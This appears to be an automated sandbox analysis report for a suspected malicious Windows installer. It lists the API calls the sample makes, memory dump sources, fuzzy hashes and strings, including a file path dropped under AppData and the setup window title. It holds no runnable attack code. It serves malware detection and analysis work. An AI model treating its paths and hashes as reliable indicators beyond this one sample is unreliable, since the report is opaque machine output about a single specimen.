                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Create
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                    • Instruction ID: dcb86bc894ab99bc20e37dc8a6176b737b641c0fdee4176656c7f25b47436c56
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 75E0E6B2110109BEEF195F50DD0AD7B375DE704304F01452EFA06D4091E6B5AD315634
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032FA,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E76
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                    • Instruction ID: 8754e0b6f25d564075f0081c534dd79b85a2df0f0bc88b3642164a4a3ec1e455
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FDE0B63221065AAFDF109F95DC00AAB7B6CEB052A0F044437FD59E7150D671EA21DAE4
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403344,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E47
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileRead
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                    • Instruction ID: bd732019988057c431ec21c3a2c50b1292625b962aa4d7912315599e48db2a91
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A9E08C3220021AABCF20AF54DC00FEB3B6CEB05760F004832FD65E6040E230EA219BE8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualProtect.KERNELBASE(6F26505C,00000004,00000040,6F26504C), ref: 6F2629B1
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                    • Opcode ID: 252dbfbe842cafd10f03ad4fa290c6a32fde90daea875c9c6b1595835679ccb8
                                                                                                                                                                                                                    • Instruction ID: 8d1191076e97a0d187285a060b8f6b96323a492481557748c07baba8f2967597
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 252dbfbe842cafd10f03ad4fa290c6a32fde90daea875c9c6b1595835679ccb8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96F0A5B0504A85DFCB50CF3C864A7293BE0BB0E325B10C52AE188D6A42E374C0A8CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,004061B5,0042C228,00000000,?,?,Call,?), ref: 0040614B
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Open
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                    • Instruction ID: b908bd292ce434c6339c018d18c1e3bfafdd2f7559b63d477f04a141d62eba1a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 94D0123214020DFBDF119E909D01FAB775DAB08350F014426FE06A9191D776D530AB14
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 00403355
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GlobalAlloc.KERNELBASE(00000040,?,6F26123B,?,6F2612DF,00000019,6F2611BE,-000000A0), ref: 6F261225
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49589958063.000000006F261000.00000020.00000001.01000000.00000005.sdmp, Offset: 6F260000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_6f260000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocGlobal
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3761449716-0
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                                      • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00405636
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008), ref: 0040565F
                                                                                                                                                                                                                    • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                                                    • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                                                    • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                                                    • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                                                    • String ID: {
                                                                                                                                                                                                                    • API String ID: 590372296-366298937
                                                                                                                                                                                                                    • Opcode ID: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                    • Instruction ID: 0d33ea325d25f8e5d5623e6ebdd73ca6fcd7ab1b09301a5b30cdd6c49ec902ff
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d79c0185c0728b850bacb0f939067e3749861c5126489aa4a3835004506ab0c2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7B15770900608FFDB119FA0DD89AAE7BB9FB48355F00403AFA41BA1A0CB755E51DF68
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404771
                                                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 0040479B
                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 0040484C
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404857
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(Call,0042D248,00000000,?,?), ref: 00404889
                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404895
                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004048A7
                                                                                                                                                                                                                      • Part of subcall function 00405904: GetDlgItemTextW.USER32(?,?,00000400,004048DE), ref: 00405917
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065B1
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004065C0
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065C5
                                                                                                                                                                                                                      • Part of subcall function 0040654E: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.10.2023.exe",0040336A,C:\Users\user\AppData\Local\Temp\,77573420,004035D9,?,00000006,00000008,0000000A), ref: 004065D8
                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0042B218,?,?,0000040F,?,0042B218,0042B218,?,00000001,0042B218,?,?,000003FB,?), ref: 0040496A
                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404985
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: lstrlenW.KERNEL32(0042D248,0042D248,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B7F
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: wsprintfW.USER32 ref: 00404B88
                                                                                                                                                                                                                      • Part of subcall function 00404ADE: SetDlgItemTextW.USER32(?,0042D248), ref: 00404B9B
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                                    • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula$Call
                                                                                                                                                                                                                    • API String ID: 2624150263-2694976400
                                                                                                                                                                                                                    • Opcode ID: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                    • Instruction ID: 9ce2ccc5872d7715d19bac2dec5c0444f9ce2fea2c0a51142092d54e0f15b7c0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68aa07a1fe6bf47594d6bed69479b5c606ba263e933e44afd0ace3f0572c8061
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8A165B1A00208ABDB11AFA5CD45AAFB7B8EF84314F10847BF601B62D1D77C99418F6D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns, xrefs: 004021C3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\perula\Tilvirkninger\Jvndgns
                                                                                                                                                                                                                    • API String ID: 542301482-3678015398
                                                                                                                                                                                                                    • Opcode ID: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                                                    • Instruction ID: 47658dbbd12ee8008517b47355d5d9d52026a5fb35fba2bce99957a22e6c3eef
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 85fa777544762f8280052d3ed6c1060dd403dfe718f2971fff495873814e0497
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8B414C71A00208AFCF04DFE4C988A9D7BB5FF48314B24457AF915EB2E0DBB99981CB44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.49571544701.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571620613.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.0000000000422000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.0000000000431000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.0000000000437000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.000000000043A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.000000000043F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.0000000000458000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571653952.000000000047C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000005.00000002.49571901230.000000000047F000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: p!C$p!C
                                                                                                                                                                                                                    • API String ID: 0-3125587631
                                                                                                                                                                                                                    • Opcode ID: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                    • Instruction ID: 7c26ffe8835462b5285d43e9ad3b72979f058f3642fe5300250d3649f4ae0bba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b391703ce6aa9d184f83615265780e2503839b4fa6daee6685a5ac04655da8ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BC15831E04219DBDF18CF68C8905EEBBB2BF88314F25866AC85677380D734A942CF95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402877
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                                                    • Opcode ID: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                                                    • Instruction ID: 0cd4a400be5c1b2ce6ea5bbb35e8853c3f48bcc8ff45a2cab7902aaadd26400c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d203f80b4415f0f6344281a2a9e2fd09f6dd1f95b509643d07a0f28621ba8c6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F08271A14104EFDB00EBA4DA499ADB378EF04314F6045BBF515F21D1DBB45D409B29
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                    • Instruction ID: 703def0becceeecb9d8561ea32c53bcab4b84ebc773a8a1d0b412cad538f794c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9639f9c0007cb4c124acbb6985d7f6f1a05031d6bc3fffd11e08744ca1378656
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE1797190470ADFDB24CF99C880BAAB7F5FF44305F15852EE497A7291E378AA91CB04
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040448E
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004044A2
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004044BF
                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004044D0
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004044DE
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004044EC
                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004044F1
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 004044FE
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404513
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040456C
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 00404573
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0040459E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 004045E1
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004045EF
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004045F2
                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040460B
                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 0040460E
                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040463D
                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 0040464F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000005.00000002.49571583482.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_#U0412#U0421_#U0436#U0438#U0440_#U0442#U0435#U0445#U043d_26.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                                                    • String ID: Call$N$gC@
                                                                                                                                                                                                                    • API String ID: 3103080414-2733886405
                                                                                                                                                                                                                    • Opcode ID: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                    • Instruction ID: 67960cbe9d5dd80a83daf25f2437327cccbb0fafcef4e9f4d39b28ee92a42e65
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 353f568027e9435f0b10a007412a0fb7b671a4650aedb506db2b7bc5b58b0be6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED618FB1900209BFDB109F60DD85EAA7B79FB84345F00853AF605B62D0D77DA951CFA8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,Grundlovssikrende36 Setup,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
